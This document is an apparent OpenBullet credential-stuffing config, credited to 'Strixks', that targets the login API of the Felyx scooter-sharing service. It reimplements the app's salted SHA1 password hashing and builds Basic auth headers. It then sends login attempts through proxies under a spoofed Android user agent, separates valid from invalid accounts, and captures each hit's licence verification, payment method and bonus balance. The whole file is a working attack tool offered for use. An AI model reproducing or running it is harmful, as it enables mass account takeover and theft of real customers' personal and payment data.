[SETTINGS]
{
  "Name": "Felyx",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-01-21T19:24:03.3628846+01:00",
  "AdditionalInfo": "",
  "Author": "Strixks",
  "Version": "1.4.3 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION Hash SHA1 "r8UY7jvUVukMsVNENfGZDUaWnzBQccGx<PASS>" -> VAR "1" 

FUNCTION Hash SHA1 "mHeWYBzWQ6dHshrmUJF7HKRMoRpwoMWj<1>" -> VAR "2" 

FUNCTION Hash SHA1 "JZWsFxFv9frtVgLYUwPahTVG4WGyYLZW<2>" -> VAR "1" 

FUNCTION Hash SHA1 "aVFGGdUx3Rt2rUYVyEDBFrvdKkFgaiMZ<USER><1>" -> VAR "2" 

FUNCTION Base64Encode "<USER>:<2>" -> VAR "basic" 

REQUEST GET "https://felyx.frontend.fleetbird.eu/api/prod/v1.0/login" 
  
  HEADER "Accept: application/json" 
  HEADER "http.useragent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-G930K Build/NRD90M)" 
  HEADER "Authorization: Basic <basic>" 
  HEADER "Content-Length: 35" 
  HEADER "Host: felyx.frontend.fleetbird.eu" 
  HEADER "Connection: Keep-Alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "ErrorLoginCredentialsInvalid" 
  KEYCHAIN Success OR 
    KEY "userId" 

PARSE "<SOURCE>" JSON "isActive" CreateEmpty=FALSE -> CAP "isActive" 

PARSE "<SOURCE>" JSON "isBlocked" CreateEmpty=FALSE -> CAP "isBlocked" 

PARSE "<SOURCE>" JSON "isDriverLicenceVerified" CreateEmpty=FALSE -> CAP "isDriverLicenceVerified" 

PARSE "<SOURCE>" JSON "isDriverLicenceVerified" CreateEmpty=FALSE -> CAP "isDriverLicenceVerified" 

PARSE "<SOURCE>" JSON "['paymentMethods'][0]['name']" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "paymentMethods" 

PARSE "<SOURCE>" JSON "['paymentMethods'][0]['title']" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "paymentMethodsTitle" 

PARSE "<SOURCE>" JSON "bonusMeters" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "bonusMeters" 

